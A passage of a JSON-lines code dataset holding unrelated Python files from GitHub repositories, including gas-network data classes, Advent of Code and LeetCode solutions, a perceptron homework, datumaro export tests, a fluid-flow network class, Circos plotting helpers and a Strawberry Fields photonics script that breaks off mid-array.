cap.release()\n # cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()\n print(\"finish\")\n","repo_name":"sgr0416st/emotion_recognition","sub_path":"test_codes/slice_movie_test.py","file_name":"slice_movie_test.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71623758800","text":"# Global imports\nfrom collections import namedtuple\n\nimport numpy as np\n\n# local imports\nfrom .unit_helper import unit\n\n_node_defaults = ( # node_id is required\n None, # pos\n 0, # height\n unit.Quantity(0, \"bar\"), # pressure_min\n unit.Quantity(np.Infinity, \"bar\"), # pressure_max\n)\n\n\nclass Node(\n namedtuple(\"NodeNamedTuple\", [\"node_id\", \"pos\", \"height\", \"pressure_min\", \"pressure_max\"], defaults=_node_defaults),\n):\n \"\"\"\n Node in a gas transport network.\n Realized by inheritance from a suitable namedtuple.\n \"\"\"\n\n\n_entry_defaults = (\n _node_defaults\n + (\n unit.Quantity(0, \"m_cube_per_hour\"), # flow_min\n unit.Quantity(np.Infinity, \"m_cube_per_hour\"), # flow_max\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_min\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_max\n )\n + (None,) * 9\n)\n\n\nclass Entry(\n namedtuple(\n \"EntryNamedTuple\",\n Node._fields\n + (\n \"flow_min\",\n \"flow_max\",\n \"nomination_min\",\n \"nomination_max\",\n \"gas_temp\",\n \"calorific_value\",\n \"norm_density\",\n \"heat_coeff_A\",\n \"heat_coeff_B\",\n \"heat_coeff_C\",\n \"molar_mass\",\n \"pseudocritical_pressure\",\n \"pseudocritical_temperature\",\n ),\n defaults=_entry_defaults,\n ),\n):\n \"\"\"\n Entry node in a gas transport network.\n Realized by inheritance from a suitable namedtuple.\n \"\"\"\n\n\n_exit_defaults = _node_defaults + (\n unit.Quantity(0, \"m_cube_per_hour\"), # flow_min\n unit.Quantity(np.Infinity, \"m_cube_per_hour\"), # flow_max\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_min\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_max\n)\n\n\nclass Exit(\n namedtuple(\n \"ExitNamedTuple\",\n Node._fields + (\"flow_min\", \"flow_max\", \"nomination_min\", \"nomination_max\"),\n defaults=_exit_defaults,\n ),\n):\n \"\"\"\n Exit node in a gas transport network.\n Realized by inheritance from a suitable namedtuple.\n \"\"\"\n","repo_name":"m-schmidt-math-opt/cost-of-not-knowing-enough","sub_path":"cost_of_not_knowing/gaslibparser/gaslibparser/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6482725797","text":"import numpy as np\n\nwith open(\"day8_input.txt\", \"r\") as f:\n grid = []\n for line in f:\n add_line = line.strip()\n grid.append([int(char) for char in add_line])\n\n grid = np.array(grid)\n scenic = 0\n for i in range(1, grid.shape[0] - 1):\n for j in range(1, grid.shape[1] - 1):\n complete = [False, False, False, False]\n num_checks = 0\n scene = [0, 0, 0, 0]\n while sum(complete) != 4:\n num_checks += 1\n if not complete[0]: # northern check\n scene[0] += 1\n if j - num_checks == 0 or grid[i, j] <= grid[i, j - num_checks]:\n complete[0] = True\n\n if not complete[1]: # southern check\n scene[1] += 1\n if j + num_checks == 98 or grid[i, j] <= grid[i, j + num_checks]:\n complete[1] = True\n\n if not complete[2]: # western check\n scene[2] += 1\n if i - num_checks == 0 or grid[i, j] <= grid[i - num_checks, j]:\n complete[2] = True\n\n if not complete[3]: # western check\n scene[3] += 1\n if i + num_checks == 98 or grid[i, j] <= grid[i + num_checks, j]:\n complete[3] = True\n\n scenic = max(scenic, scene[0] * scene[1] * scene[2] * scene[3])\n print(scenic)\n","repo_name":"ThePoleThatFishes/attempts-at-aoc","sub_path":"Day 08/day8.2.py","file_name":"day8.2.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38216959763","text":"import numpy as np\n\ndef hard_limiter(u): #hard limit activation function (step function)\n if u < 0:\n y_pred = 0\n return y_pred\n\n\ndef model(input, weight, bias): #Perceptron Model \n\ty = np.dot(weight, input) + bias\n\ty = hard_limiter(y)\n\treturn y\n\n##OR Logic Function\ndef or_logic(input, y_pred): #initially w1 = 0 , w2 = 0 , bias = -0.2\n w1 = 0\n w2 = 0\n weight = np.array([w1, w2])\n bias = -0.2\n Y_true = [0,1] \n Y_pred = [y_pred, y_pred] \n error = np.square(np.subtract(Y_true,Y_pred)).mean()\n print(error)\n return model(input, weight, bias)\n\n# testing the Perceptron Model\ntest1 = np.array([0, 1])\ntest2 = np.array([1, 1])\ntest3 = np.array([0, 0])\ntest4 = np.array([1, 0])\n\ndesired1 = 0\ndesired2 = 1\ndesired3 = 0\ndesired4 = 0\n\"\"\"\nout1 = or_logic(test1)\nout2 = or_logic(test2)\nout3 = or_logic(test3)\nout4 = or_logic(test4)\n\n\"\"\"\n\n#if desired1 == out1 \n\"\"\"\nprint(\"OR({}, {}) = {}\".format(0, 1, or_logic(test1)))\nprint(\"OR({}, {}) = {}\".format(1, 1, or_logic(test2)))\nprint(\"OR({}, {}) = {}\".format(0, 0, or_logic(test3)))\nprint(\"OR({}, {}) = {}\".format(1, 0, or_logic(test4)))\n\"\"\"\n\n#if out1 = \n\n#def updating_weights(test2):\n\n\n\n","repo_name":"samiya-jabbar/NED-Masters-Deep-learning-assignment-1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9126239996","text":"from unittest import TestCase\nfrom zipfile import ZipFile\nimport os\nimport os.path as osp\n\nimport numpy as np\n\nfrom datumaro.cli.__main__ import main\nfrom datumaro.components.dataset import Dataset, DatasetItem\nfrom datumaro.util.test_utils import TestDir, compare_datasets\n\nfrom ..requirements import Requirements, mark_requirement\n\n\ndef run(test, *args, expected_code=0):\n test.assertEqual(expected_code, main(args), str(args))\n\ndef make_zip_archive(src_path, dst_path):\n with ZipFile(dst_path, 'w') as archive:\n for (dirpath, _, filenames) in os.walk(src_path):\n for name in filenames:\n path = osp.join(dirpath, name)\n archive.write(path, osp.relpath(path, src_path))\n\nclass ImageZipIntegrationScenarios(TestCase):\n @mark_requirement(Requirements.DATUM_267)\n def test_can_save_and_load(self):\n source_dataset = Dataset.from_iterable([\n DatasetItem(id='1', image=np.ones((5, 5, 3))),\n DatasetItem(id='2', image=np.ones((2, 8, 3)))\n ])\n\n with TestDir() as test_dir:\n source_dataset.export(test_dir, format='image_dir')\n zip_path = osp.join(test_dir, 'images.zip')\n make_zip_archive(test_dir, zip_path)\n\n run(self, 'create', '-o', test_dir)\n run(self, 'add', 'path', '-p', test_dir, '-f', 'image_zip', zip_path)\n\n export_path = osp.join(test_dir, 'export.zip')\n run(self, 'export', '-p', test_dir, '-f', 'image_zip',\n '-o', test_dir, '--overwrite', '--',\n '--name', osp.basename(export_path)\n )\n\n parsed_dataset = Dataset.import_from(export_path, format='image_zip')\n compare_datasets(self, source_dataset, parsed_dataset)\n\n @mark_requirement(Requirements.DATUM_267)\n def test_can_export_zip_images_from_coco_dataset(self):\n with TestDir() as test_dir:\n coco_dir = osp.join(__file__[:__file__.rfind(osp.join('tests', ''))],\n 'tests', 'assets', 'coco_dataset')\n\n run(self, 'create', '-o', test_dir)\n run(self, 'add', 'path', '-p', test_dir, '-f', 'coco', coco_dir)\n\n export_path = osp.join(test_dir, 'export.zip')\n run(self, 'export', '-p', test_dir, '-f', 'image_zip',\n '-o', test_dir, '--overwrite', '--',\n '--name', osp.basename(export_path))\n\n self.assertTrue(osp.isfile(export_path))\n with ZipFile(export_path, 'r') as zf:\n images = {f.filename for f in zf.filelist}\n self.assertTrue(images == {'a.jpg', 'b.jpg'})\n\n @mark_requirement(Requirements.DATUM_267)\n def test_can_change_extension_for_images_in_zip(self):\n source_dataset = Dataset.from_iterable([\n DatasetItem(id='1', image=np.ones((5, 5, 3))),\n DatasetItem(id='2', image=np.ones((2, 8, 3)))\n ])\n\n with TestDir() as test_dir:\n source_dataset.export(test_dir, format='image_dir', image_ext='.jpg')\n zip_path = osp.join(test_dir, 'images.zip')\n make_zip_archive(test_dir, zip_path)\n\n run(self, 'create', '-o', test_dir)\n run(self, 'add', 'path', '-p', test_dir, '-f', 'image_zip', zip_path)\n\n export_path = osp.join(test_dir, 'export.zip')\n run(self, 'export', '-p', test_dir, '-f', 'image_zip',\n '-o', test_dir, '--overwrite', '--',\n '--name', osp.basename(export_path), '--image-ext', '.png')\n\n self.assertTrue(osp.isfile(export_path))\n with ZipFile(export_path, 'r') as zf:\n images = {f.filename for f in zf.filelist}\n self.assertTrue(images == {'1.png', '2.png'})\n","repo_name":"certiware/posemaro","sub_path":"tests/cli/test_image_zip_format.py","file_name":"test_image_zip_format.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12702915012","text":"\ndef merge(left,right):\n result=[]\n i,j=0,0\n while i\n# @Date: 08-03-2022\n# @Email: felixuwekramer@proton.me\n# @Last modified by: kramer\n# @Last modified time: 08-07-2022\n\n\nimport numpy as np\nimport networkx as nx\nfrom kirchhoff.circuit_init import Circuit\nfrom kirchhoff.circuit_flow import FlowCircuit\nfrom dataclasses import dataclass, field\n\n\n@dataclass\nclass Flow():\n \"\"\"\n The flow class defines variables and methods for computing Hagen-Poiseuille\n flows on kirchhoff networks.\n\n To be used in conjunction with 'kirchhoff' and 'goflow' in order to\n simulate flow-driven network morphogenesis.\n\n Attributes:\n constr (networkx.Graph):\\n\n A networkx graph or circuit to initilize a flow on.\n pars_source (dict):\\n\n The boundary conditions (Neumann) determining the in/outlfow of\n fluid accross the network.\n pars_plexus (dict):\\n\n The initial plexus, edge values of conductivity, the flow is to\n be calculated on.\n\n Methods:\n init_flow():\\n\n Initialize flow variables, boundaries and handle constructor\n exceptions.\n set_boundaries():\\n\n Explicitly set Neumann-boudaries and initial plexus as defined via\n 'pars_source/plexus' parameters. Set internal output varaibles and\n incidence information.\n find_roots(G):\\n\n Given a networkx graph, return all source-nodes (needs the nodal\n 'source' attribute set).\n find_sinks(G):\\n\n Given a networkx graph, return all sink-nodes (needs the nodal\n 'source' attribute set).\n alpha_omega(G, j):\\n\n Return the start (alpha) and end(omega) node of an edge, for any\n given networkx graph with edge labeling j.\n calc_pressure(conduct, source):\\n\n Compute the pressure landscape, considering the current parameter\n and plexus condition.\n calc_flow_from_pressure(conduct, dP):\\n\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n calc_flow(conduct, source):\\n\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n calc_sq_flow(sconduct, source):\\n\n Compute the squared pressure/flow landscape, considering the\n current parameter and plexus condition.\n calc_cross_section_from_conductivity(conductivity, conductance):\\n\n Compute the squared radii values from the current conductivity\n matrix and conductance value.\n calc_conductivity_from_cross_section(R_sq, conductance):\\n\n Compute the conductivity matrix from the current squared radii\n values and conductance value.\n calc_configuration_flow():\\n\n Compute the pressure/flow landscape, considering the current\n parameter and plexus condition.\n\n \"\"\"\n\n constr: nx.Graph = field(repr=False, init=True)\n pars_source: dict = field(default_factory=dict, repr=False)\n pars_plexus: dict = field(default_factory=dict, repr=False)\n\n def __post_init__(self):\n\n self.init_flow()\n\n def init_flow(self):\n\n \"\"\"\n Initialize flow variables, boundaries and handle constructor\n exceptions.\n\n Raises:\n Exception:\\n\n Warning! Non-networkx type given for initialization, no\n internal circuit established.\n\n \"\"\"\n\n self.info: str = 'unknown'\n\n if isinstance(self.constr, nx.Graph):\n\n self.circuit = FlowCircuit(self.constr)\n\n elif isinstance(self.constr, FlowCircuit):\n\n self.circuit = self.constr\n\n elif isinstance(self.constr, Circuit):\n\n self.circuit = FlowCircuit(self.constr.G)\n\n else:\n raise Exception(\n '''\n Warning! Non-networkx type given for initialization, no\n internal circuit established.\n '''\n )\n\n self.set_boundaries()\n\n def set_boundaries(self):\n\n \"\"\"\n Explicitly set Neumann-boudaries and initial plexus as defined via\n 'pars_source/plexus' parameters. Set internal output varaibles and\n incidence information.\n\n \"\"\"\n\n par1 = self.circuit.graph['source_mode']\n par2 = self.circuit.graph['plexus_mode']\n\n if par1 == '' or par2 == '':\n self.circuit.set_source_landscape(**self.pars_source)\n self.circuit.set_plexus_landscape(**self.pars_plexus)\n\n self.info = self.circuit.info\n self.B, self.BT = self.circuit.get_incidence_matrices()\n\n def find_roots(self, G):\n\n \"\"\"\n Given a networkx graph, return all source-nodes (needs the nodal\n 'source' attribute set).\n\n Args:\n G (networkx.Graph):\\n\n A networkx graph.\n\n Returns:\n list:\\n\n A list of root/source nodes of the given graph.\n\n \"\"\"\n\n roots = [n for n in G.nodes() if G.nodes[n]['source'] > 0]\n\n return roots\n\n def find_sinks(self, G):\n \"\"\"\n Given a networkx graph, return all sink-nodes (needs the nodal\n 'source' attribute set).\n\n\n Args:\n G (networkx.Graph):\\n\n A networkx graph.\n\n Returns:\n list:\\n\n A list of outlet/sink nodes of the given graph.\n\n \"\"\"\n\n list_n = self.circuit.list_graph_nodes\n sinks = [n for n in list_n if G.nodes[n]['source'] < 0]\n\n return sinks\n\n def alpha_omega(self, G, j):\n \"\"\"\n Return the start (alpha) and end(omega) node of an edge, for any given\n networkx graph with edge labeling j.\n\n Args:\n G (networkx.Graph):\\n\n A networkx graph.\n j (int):\\n\n An existent edge label.\n\n Returns:\n node: The 'alpha' node of edge (labeld j)\n node: The 'omega' node of edge (labeld j)\n \"\"\"\n\n labels = nx.get_edge_attributes(G, 'label')\n for e, label in labels.items():\n if label == j:\n alpha = e[1]\n omega = e[0]\n\n return alpha, omega\n\n def calc_pressure(self, conduct, source):\n \"\"\"\n Compute the pressure landscape, considering the current parameter\n and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n source (array):\\n\n The nodal source vector.\n\n Returns:\n ndarray: Edge-vector of pressure-differences.\n ndarray: Node-vector of pressures levels.\n\n \"\"\"\n\n OP = np.dot(self.B, np.dot(np.diag(conduct), self.BT))\n P, RES, RG, si = np.linalg.lstsq(OP, source, rcond=None)\n dP = np.dot(self.BT, P)\n\n return dP, P\n\n def calc_flow_from_pressure(self, conduct, dP):\n \"\"\"\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n dP (array):\\n\n Edge-vector of pressure-differences.\n\n Returns:\n ndarray: Edge-vector of directed flow rates.\n \"\"\"\n\n Q = np.dot(np.diag(conduct), dP)\n\n return Q\n\n def calc_flow(self, conduct, source):\n \"\"\"\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n source (array):\\n\n The nodal source vector.\n\n Returns:\n ndarray: Edge-vector of directed flow rates.\n \"\"\"\n\n dP, P = self.calc_pressure(conduct, source)\n Q = np.dot(np.diag(conduct), dP)\n\n return Q\n\n def calc_sq_flow(self, conduct, source):\n \"\"\"\n Compute the squared pressure/flow landscape, considering the current\n parameter and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n source (array):\\n\n The nodal source vector.\n\n Returns:\n ndarray: Edge-vector of squared flow rate values.\n ndarray: Edge-vector of squared pressure difference values.\n \"\"\"\n\n dP, P = self.calc_pressure(conduct, source)\n Q = self.calc_flow_from_pressure(conduct, dP)\n\n p_sq = np.multiply(dP, dP)\n q_sq = np.multiply(Q, Q)\n\n return p_sq, q_sq\n\n def calc_cross_section_from_conductivity(self, conductivity, conductance):\n \"\"\"\n Compute the squared radii values from the current conductivity matrix\n and conductance value.\n\n Args:\n conductivity (array):\\n\n The network's edge conductivity matrix.\n conductance (array):\\n\n The graph's conductance unit.\n\n Returns:\n ndarray: Edge-vector of squared radii values.\n \"\"\"\n\n R_sq = np.sqrt(conductivity/conductance)\n\n return R_sq\n\n def calc_conductivity_from_cross_section(self, R_sq, conductance):\n \"\"\"\n Compute the conductivity matrix from the current squared radii values\n and conductance value.\n\n Args:\n R_sq (array):\\n\n Edge-vector of squared radii values.\n conductance (array):\\n\n The graph's conductance unit.\n\n Returns:\n ndarray: The network's edge conductivity matrix.\n \"\"\"\n\n conductivity = np.power(R_sq, 2)*conductance\n\n return conductivity\n\n def calc_configuration_flow(self):\n \"\"\"\n Compute the pressure/flow landscape, considering the current parameter\n and plexus condition.\n\n Returns:\n ndarray: Edge-vector of directed flow rates.\n ndarray: Edge-vector of pressure differences.\n \"\"\"\n\n k = self.circuit.edges['conductivity']\n src = self.circuit.nodes['source']\n\n dP, P = self.calc_pressure(k, src)\n Q = np.dot(np.diag(k), dP)\n\n return Q, dP\n","repo_name":"felixk1990/kirchhoff-hydro","sub_path":"hailhydro/flow_init.py","file_name":"flow_init.py","file_ext":"py","file_size_in_byte":10246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39549690603","text":"from operator import itemgetter\nfrom collections import Counter\nfrom itertools import ifilter, imap, tee\n\n# data for use_subvalues=True should be an iterable with entries of the form:\n# {\n# ltag: (l_sub0, l_sub1, ... l_subn), \n# rtag: (r_sub0, r_sub1, ... r_subm), \n# ... \n# } \n\nclass ImageData(object):\n \n def __init__(self, \n data, \n ltag, \n rtag, \n use_subvalues_left=False, \n use_subvalues_right=False, \n **kwargs):\n\n self.data = data\n self.ltag = ltag\n self.rtag = rtag\n\n if kwargs.get('filter'):\n self.data = ifilter(kwargs['filter'], self.data)\n \n # Convert all tags to tuples if only one is a tuple on input.\n if use_subvalues_left and not use_subvalues_right:\n self.data = convert_to_tuples(self.data, self.rtag)\n if use_subvalues_right and not use_subvalues_left:\n self.data = convert_to_tuples(self.data, self.ltag)\n\n self.use_subvalues = (use_subvalues_right or use_subvalues_left)\n self.compute_counts()\n\n def compute_counts(self):\n\n # The use_subvalues flag signifies that our data entries are\n # tuples of primitives, and we want to count the entries in\n # the tuples rather than the tuples themselves.\n if self.use_subvalues:\n \n self.data, copy0, copy1 = tee(self.data, 3)\n l_max, r_max = compute_max_entry_length(copy0, self.ltag, self.rtag)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_subvalues(copy1, self.ltag, self.rtag, l_max, r_max)\n\n else:\n self.data, copy = tee(self.data, 2)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_primitives(copy, self.ltag, self.rtag)\n\nclass CMapImageData(object):\n \n def __init__(self, \n data, \n mapping,\n use_subvalues_left=True, # default to true because everything is a tuple\n use_subvalues_right=True, \n use_self_map=False,\n **kwargs):\n\n self.data = data\n self.mapping = mapping\n self.ltag = self.mapping.left_output_key\n self.rtag = self.mapping.right_output_key\n self.use_self_map = use_self_map\n \n self.data = ifilter(lambda x: len(x['Major']) <= 2, mapping.apply(self.data))\n if kwargs.get('filter'):\n self.data = ifilter(kwargs['filter'], self.data)\n\n self.use_subvalues = (use_subvalues_right or use_subvalues_left)\n self.compute_counts()\n\n def __iter__(self):\n data_copy, self.data = tee(self.data, 2)\n return data_copy\n\n def compute_counts(self):\n\n # The use_subvalues flag signifies that our data entries are\n # tuples of primitives, and we want to count the entries in\n # the tuples rather than the tuples themselves.\n\n if self.use_self_map:\n self.data, copy = tee(self.data, 2)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_self_map(copy, self.ltag, self.rtag) \n\n elif self.use_subvalues:\n \n self.data, copy0, copy1 = tee(self.data, 3)\n l_max, r_max = compute_max_entry_length(copy0, self.ltag, self.rtag)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_subvalues(copy1, self.ltag, self.rtag, l_max, r_max)\n\n else:\n self.data, copy = tee(self.data, 2)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_primitives(copy, self.ltag, self.rtag)\n\ndef compute_counts_self_map(data, ltag, rtag):\n \n lvalue_counts = Counter()\n value_pair_counts = Counter()\n\n # Returns a stream of tuples containing (entry[ltag], entry[rtag])\n # for each entry.\n tag_values = imap(itemgetter(ltag, rtag), data)\n for lvalue, rvalue in tag_values:\n\n # if min(lvalue[0], rvalue[0]) == rvalue[0]:\n # tmp = rvalue\n # rvalue = lvalue\n # lvalue = tmp\n \n assert(isinstance(lvalue, tuple)), \"Non-tuple entry: (%s %r)\" % (ltag, lvalue)\n assert(isinstance(rvalue, tuple)), \"Non-tuple: (%s %r)\" % (rtag, rvalue)\n\n lvalue_counts[ lvalue[0] ] += 1\n lvalue_counts[ rvalue[0] ] += 1\n\n value_pair_counts[(lvalue[0], rvalue[0])] += 1\n\n lvalue_total = sum(count for count in lvalue_counts.itervalues())\n pair_total = sum(count for count in value_pair_counts.itervalues())\n\n # Convert the counts to ints so that circos can parse them correctly.\n #intify_counts(lvalue_counts)\n #intify_counts(value_pair_counts)\n\n assert(lvalue_total == pair_total*2)\n \n return lvalue_counts, Counter(), value_pair_counts\n\ndef compute_counts_primitives(data, ltag, rtag):\n \n copy0, copy1, copy2 = tee(data, 3)\n\n lvalues = (str(entry[ltag]) for entry in copy0)\n lvalue_counts = Counter(lvalues)\n\n rvalues = (str(entry[rtag]) for entry in copy1)\n rvalue_counts = Counter(rvalues)\n \n # Returns tuples of the form: (entry[ltag], entry[rtag]).\n\n value_pairs = ( (str(entry[ltag]), str(entry[rtag])) for entry in copy2 )\n value_pair_counts = Counter(value_pairs)\n\n lvalue_totals = sum(count for count in lvalue_counts.itervalues())\n rvalue_totals = sum(count for count in rvalue_counts.itervalues())\n pair_totals = sum(count for count in value_pair_counts.itervalues())\n\n assert(lvalue_totals == rvalue_totals == pair_totals)\n\n return lvalue_counts, rvalue_counts, value_pair_counts\n\ndef compute_max_entry_length(data, ltag, rtag):\n\n lval_max = 0\n rval_max = 0\n\n for entry in data:\n\n if len(entry[ltag]) > lval_max:\n lval_max = len(entry[ltag])\n\n if len(entry[rtag]) > rval_max:\n rval_max = len(entry[rtag])\n\n return lval_max, rval_max\n\ndef compute_counts_subvalues(data, ltag, rtag, lval_max, rval_max):\n\n base_units = lval_max * rval_max\n\n lvalue_counts = Counter()\n rvalue_counts = Counter()\n value_pair_counts = Counter()\n\n # Returns a stream of tuples containing (entry[ltag], entry[rtag])\n # for each entry.\n tag_values = imap(itemgetter(ltag, rtag), data)\n for lvalue, rvalue in tag_values:\n \n total_pairs = len(lvalue) * len(rvalue)\n assert(isinstance(lvalue, tuple)), \"Non-tuple entry: (%s %r)\" % (ltag, lvalue)\n assert(isinstance(rvalue, tuple)), \"Non-tuple: (%s %r)\" % (rtag, rvalue)\n \n # Compute counts of distinct l_subvalue. The base unit per entry\n # is spread across each sub-value of lvalue.\n for l_subvalue in lvalue:\n \n lvalue_counts[l_subvalue] += (base_units / (len(lvalue) * 1.0))\n\n # While we're here, compute counts of (lvalue, rvalue)\n # pairs. The base unit per entry is spread across all\n # possible pairs of sub-values between lvalue and rvalue.\n for r_subvalue in rvalue:\n value_pair_counts[(l_subvalue, r_subvalue)] += (base_units / (total_pairs * 1.0))\n\n # Compute counts of distinct r_subvalues.\n for r_subvalue in rvalue:\n rvalue_counts[r_subvalue] += (base_units / (len(rvalue) * 1.0))\n\n lvalue_total = sum(count for count in lvalue_counts.itervalues())\n rvalue_total = sum(count for count in rvalue_counts.itervalues())\n pair_total = sum(count for count in rvalue_counts.itervalues())\n\n # Convert the counts to ints so that circos can parse them correctly.\n intify_counts(lvalue_counts)\n intify_counts(rvalue_counts)\n intify_counts(value_pair_counts)\n\n assert(lvalue_total == rvalue_total == pair_total)\n \n return lvalue_counts, rvalue_counts, value_pair_counts\n\ndef intify_counts(counter):\n \n for key in counter.iterkeys():\n counter[key] = int(counter[key])\n\ndef convert_to_tuples(gen, key):\n\n for entry in gen:\n entry[key] = tuple([entry[key]])\n yield entry\n","repo_name":"KaisonTanabe/CircosProject","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22792938163","text":"def removeDuplicates1(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n i = 0\n length = len(nums)\n while i < length:\n num = nums[i]\n counts = nums.count(num)\n if counts > 1:\n nums2 = nums[i + counts:]\n nums = nums[:i+1]\n nums.extend(nums2)\n length=length-counts+1\n i += 1\n print(nums)\n return len(nums)\n\ndef removeDuplicates(nums):\n #return list(set(listA))\n\n return len(sorted(set(nums), key = nums.index))\n\n\nprint(removeDuplicates([1,1,2,2,5,5,5]))","repo_name":"qq1334713380/leetcode","sub_path":"算法/base/list/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22781949674","text":"import pytest\nfrom unittest.mock import MagicMock, patch, Mock\nfrom io import StringIO\nfrom contextlib import redirect_stdout\nimport argparse\nfrom argparse import ArgumentParser, FileType\nimport os,sys\nimport yaml\nfrom yaml import FullLoader\n\nj2 = os.path.abspath('.')\nsys.path.insert(1, j2)\nimport j2parser\n\n\nYMLVARS = \"test/template.vars.yml\"\nJSONVARS = \"test/template.vars.json\"\nCMDLINEVARS = [line.lstrip().rstrip() for line in open(\"test/cmdline.vars.list\")]\nENTRYPOINT = [\"command\", \"path/to/config\"]\nTESTARGS = [\n \"\",\n \"-i\",\n \"test/template.vars.yml\",\n \"--var\",\n \"local_docker_path=momo/choko/docker\",\n \"--entrypoint\",\n \"command\",\n \"path/to/config\",\n \"-o\",\n \"manifest.yml\",\n \"test/template.yml\",\n]\n\n\nclass TestJ2parserLoadVars:\n def test_load_vars_1(self):\n result = {}\n result.update(j2parser.load_vars(YMLVARS))\n assert result['local_docker_path'] == 'container/ntrip_docker/Dockerfile'\n return result\n\n def test_load_vars_2(self):\n result = {}\n result.update(j2parser.load_vars(JSONVARS))\n assert result['sidecar_service'] == 'sidecar'\n return result\n\n\n#\nclass TestJ2parserParseCmdlineVars:\n def test_parse_cmdline_vars(self):\n result = {}\n result.update(j2parser.parse_cmdline_vars(CMDLINEVARS))\n assert result['remote_docker_path'] == 'aws_uri'\n return result\n\n\nclass Test_J2parser_Parse_nasty_entrypoint_args:\n def test_parse_nasty_entrypoint_args_1(self):\n result = {}\n result.update(j2parser.parse_nasty_entrypoint_args(ENTRYPOINT))\n assert result == {'entrypoint': ['command', 'path/to/config']}\n return result\n\n\nclass Test_J2parser_Main:\n def test_main_1(self):\n with patch.object(sys, \"argv\", new=TESTARGS):\n f1 = StringIO()\n with redirect_stdout(f1):\n j2parser.main(sys.argv)\n with open('manifest.yml', 'r') as fo:\n generatedfile = {}\n generatedfile = yaml.load(fo, Loader=FullLoader)\n image = str(TESTARGS[4].split(\"=\", 1)[1])\n assert image == generatedfile[\"image\"]['build']\n\n\n","repo_name":"hemzaz/scripts","sub_path":"jinjaparser/test/j2parser_test.py","file_name":"j2parser_test.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34582947305","text":"import numpy as np\r\n\r\nhidden_size = 50 #隐藏层神经元个数\r\nvocab_size = 4 #词汇表大小\r\n\r\ndef init_orthogoanl(param):\r\n '''正交初始化'''\r\n if param.ndim < 2:\r\n raise ValueError('参数维度必须大于2')\r\n rows,cols =param.shape\r\n new_param = np.random.randn(rows,cols)\r\n if rowslist:\n if (i == d):\n self.output_list.append(bits)\n return\n bits.append(0)\n self.generateAllBitStrings(d, bits[:], i + 1)\n \n bits[-1] = 1\n self.generateAllBitStrings(d, bits[:], i + 1)\n\n def get_prob(self):\n self.generateAllBitStrings(self.d, [], 0)\n print(\"\\nprobability of every output mode:\")\n start = time.time()\n for i in self.output_list:\n #prob = results.state.fock_prob(i)\n #print(\"|{}>: {}\".format(\"\".join(str(j) for j in i), prob))\n p_click = np.real_if_close(threshold_detection_prob(self.mu, self.cov, i))\n self.output_prob.append(p_click)\n print(\"|{}>: {}\".format(\"\".join(str(j) for j in i), p_click))\n self.time_cost = time.time()- start\n print(\"Time cost: \"+ str(self.time_cost)+'[s]')\n\n\n\n def record_cov(self):\n data_folder = Path(\"./data/\")\n file = data_folder / \"covMatrix.txt\"\n with open(file, 'w+') as fp:\n for row in self.cov:\n fp.write(' '.join(map(str, row)))\n fp.write('\\n')\n\n filename = \"covMatrix_\"+str(self.d)+\"d.txt\"\n file2 = data_folder / filename\n with open(file2, 'w+') as fp:\n for row in self.cov:\n fp.write(' '.join(map(str, row)))\n fp.write('\\n')\n\n def write_to_csv(self):\n data_folder = Path(\"./data/\")\n file = data_folder / (\"strawberry_\" + str(self.d) +\"d.csv\")\n with open(file, 'w+') as fp:\n fp.write(\"strawberryField\\n\")\n fp.write(\"time cost:,\"+str(self.time_cost)+'[s]\\n')\n fp.write(\"output, probability\\n\")\n for i,row in enumerate(self.output_list):\n fp.write(''.join(str(x) for x in self.output_list[i])+','+\n str(self.output_prob[i])+'\\n')\n\n\n\n\n# Main entry point of the program\nif __name__ == \"__main__\":\n\n # define the linear interferometer\n \n U = np.array([\n [ 0.219546940711-0.256534554457j, 0.611076853957+0.524178937791j, -0.102700187435+0.474478834685j,-0.027250232925+0.03729094623j],\n [ 0.451281863394+0.602582912475j, 0.456952590016+0.01230749109j, 0.131625867435-0.450417744715j, 0.035283194078-0.053244267184j],\n [ 0.038710094355+0.492715562066j,-0.019212744068-0.321842852355j,-0.240776471286+0.524432833034j,-0.458388143039+0.329633367819j],\n 